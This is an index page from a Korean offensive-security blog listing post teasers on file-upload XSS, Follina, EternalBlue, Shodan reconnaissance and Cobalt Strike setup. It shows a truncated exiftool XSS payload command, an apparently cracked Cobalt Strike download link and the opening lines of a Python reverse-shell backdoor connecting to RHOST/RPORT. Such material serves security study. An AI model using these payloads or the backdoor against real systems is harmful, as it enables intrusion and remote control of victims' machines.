$ whoami

Home

분류 전체보기 (116)

Home

분류 전체보기 (116)

블로그 내 검색

CONTACT

HACKINTOANETWORK
WEB APPLICATION BUG HUNTER, PENETRATION TESTER

Exploit (9)

Exploit/Exploit
[XSS] File upload XSS
XSS via filename Node.js third-party modules disclosed on HackerOne: [tianma-static]... hackerone.com create filename start tianma-static xss fired XSS via Metadata Shopify disclosed on HackerOne: XSS Stored via Upload avatar PNG... hackerone.com Exiftool를 사용하여 메타데이터에 xss 페이로드 쓰기 파일에서 exif 메타데이터가 제거되지 않은 경우에 발생할 수 있다. exiftool command exiftool -Comment="\">" xss_comment_exif_metadata_double_quot..

2023. 2. 2.

Exploit/Bug Bounty
[Bug Bounty] Daum Cafe, Tistory Stored XSS PoC
보호되어 있는 글입니다. 비밀번호를 입력해야 내용을 볼 수 있어요.

2023. 1. 24.

Exploit/Exploit
How to install Parallels tools on Kali Linux kernel 5.18.0
Parallels tools on Kali Linux kernel 5.18.0 설치 에러 해결 방법. Linux kali 5.18.0-kali7-arm64 #1 SMP Debian 5.18.16-1kali1 (2022-08-31) aarch64 GNU/Linux 아래 명령어를 따라 쳐주세요. # apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y # reboot # apt-get install linux-headers-$(uname -r) # tar -zxvf prl_mod.tar.gz 패치를 다운받아줘야 합니다. 아래 링크 남깁니다. Patch Download Link : https://drive.google.com/file/d/18em0Z..

2022. 9. 27.

Exploit/Tools
Cobalt Strike - Kali Linux 2022.3 ARM64
Platform Kali Linux 2022.3 ARM64 (Tested) Downlaods [Cobalt-Strike Downloads] https://mega.nz/file/iZ8jQQ4K#Y6kwDNGBQKfowybJisZX9XpK6-SKyW3LO6-_X6VKRFo [jdk-8-java-8 Downloads] https://awesometolearns.blogspot.com/2021/10/how-to-install-jdk-8-java-8-in-linux.html Kali Linux 2022.3 ARM64 JDK 8 Install Guide sudo tar -xvzf ~/Downloads/jdk-8u301-linux-aarch64.tar.gz sudo nano /etc/environment [Add ..

2022. 9. 11.

Exploit/Exploit
[Follina] Microsoft Office code execution vulnerability
Follina Exploit (CVE-2022-30190) MS 오피스 제로데이 취약점 Follina (CVE-2022-30190) Word와 같은 프로그램에서 URL 프로토콜을 사용하여 MSDT를 호출할 때 원격 코드 실행 취약점이 존재한다. 이 취약점 공격에 성공한 공격자는 MS 오피스 프로그램의 권한으로 원격 코드를 실행할 수 있다. 그런 다음 공격자는 사용자 권한이 허용하는 범위에서 프로그램을 설치하거나, 데이터를 보거나, 변경하거나, 삭제하거나, 새 계정을 만들 수 있다. 이 취약점은 nao_sec 이라는 사이버 보안 연구 팀에 의해 발견되었다. 이름이 Follina인 이유? 정보보안 커뮤니티에서는 이 취약점을 'Folina'라고 부른다. 이 취약점은 보안 연구원들이 VirusTotal의 0..

2022. 6. 4.

Exploit/Tools
[Tools] Python Backdoor
Payload import os import time import socket import getpass import platform import subprocess from colorama import Fore, Style def client_connect(): global sock try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((RHOST, RPORT)) return sock except ConnectionRefusedError: time.sleep(5) def header(): header = f"""{Fore.LIGHTBLUE_EX}┌──({Fore.CYAN}{getpass.getuser()}{Style.RES..

2022. 4. 29.

Exploit/Bug Bounty
[Shodan] 쇼단을 이용한 모의해킹 및 정보수집
OSINT(Open-Source INTelligence) 공개적으로 접근 가능한 자원으로부터 모아진 정보를 얻을 수 있다. 이때 쇼단이나 구글 등을 OSINT라고 한다. Offensive: 직접 정보 수집(적극적인) - Domain name, google cache, scraping, google hacking database Defensive: 수집된 정보 확인(소극적인) - dark web, security breaches, threat intelligence Shodan 이란? 쇼단은 인터넷에 연결된 장비들을 찾아주는 검색 엔진으로, 기업 내 취약할 수 있는 장비를 빠르게 발견하는 데에 도움을 준다. 구글을 비롯한 다른 검색엔진은 웹만 인덱싱하지만 쇼단은 웹캠, 정수 처리장, 요트, 의료 장비, 신..

2022. 3. 1.

Exploit/Exploit
[EternalBlue] Windows SMBv1 Vulnerability
이터널 블루란? EternalBlue는 일련의 Microsoft 소프트웨어 취약점과 NSA가 사이버 공격 도구로 만든 익스플로잇의 이름이다. Microsoft에서 공식적으로 MS17-010으로 명명한 EternalBlue 익스플로잇은 Windows 운영 체제에만 영향을 미치지만 SMBv1(Server Message Block 버전 1) 파일 공유 프로토콜을 사용하는 모든 것은 기술적으로 랜섬웨어 및 기타 사이버 공격의 대상이 될 위험이 있다. EternalBlue는 어떻게 개발되었나? Microsoft 의 비난 성명서 에 따르면 EternalBlue는 미국 국가안보국(National Security Agency )에서 사이버 보안 취약점을 해당 공급업체에 신고하지 않고 무기화하여 논란의 여지가 있는 프로..

2022. 2. 15.

이전

1 2

다음

전체 글 보기

Tistory 로그인

Tistory 로그아웃

로그아웃 글쓰기 관리

Today 0

Total 13,024

Powered by hackintoanetwork

Designed by Nana

블로그 이미지

hackintoanetwork

티스토리툴바